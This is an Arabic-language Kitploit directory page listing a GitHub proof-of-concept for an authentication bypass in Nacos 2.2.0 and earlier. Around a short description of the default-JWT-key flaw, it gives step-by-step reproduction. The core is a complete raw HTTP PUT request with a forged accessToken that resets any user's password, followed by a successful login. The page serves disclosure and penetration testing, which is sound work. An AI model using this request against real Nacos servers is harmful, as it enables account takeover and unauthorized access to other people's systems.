Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Alibab-Nacos-Unauthorized-Reset-PWD — Alibab-Nacos-Unauthorized-Reset PWD | Kitploit
أدوات/GitHubGitHub/al1ex/alibab-nacos-unauthorized-reset-pwd
Authentication & AuthorizationPassword AttacksExploitationWeb Application ExploitationPenetration TestingMisconfigurationRed TeamingAPI Security

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
al1ex/alibab-nacos-unauthorized-reset-pwd

Alibab-Nacos-Unauthorized-Reset-PWD

Alibab-Nacos-Unauthorized-Reset PWD

عرض المستودع
41منذ 3 سنواتلم تتم المراجعة بعد

تأثير الثغرة

تم اكتشاف مشكلة في Nacos تؤثر على الإصدارات Nacos <= 2.2.0. عند استخدام المستخدم للمفتاح الافتراضي JWT Key، فإن ذلك يسمح للمهاجم بإعادة تعيين كلمة مرور أي مستخدم والاستيلاء على حسابه.

المنتج المتأثر

إصدار Nacos <= 2.2.0

إعادة إنتاج الثغرة

الخطوة 1: الحصول على اسم المستخدم (يمكن استخدام ثغرة قديمة أو التخمين)

getuser

الخطوة 2: إعادة تعيين كلمة المرور

root@kitploit:~
PUT /nacos/v1/auth/users HTTP/1.1
Host: xx.xx.xxx.xx
Content-Length: 33
Accept: application/json, text/plain, */*
accessToken: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhbDFleCIsImV4cCI6MTY2ODA4OTk2N30.hv0MWlHISYCgvIDQhidQBCeyYb7tbG0JrbNyx-9kDzc
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=
Connection: close

username=al1ex&newPassword=al22ex

reset

الخطوة 3: تسجيل الدخول بنجاح

logins

تنزيل الأداة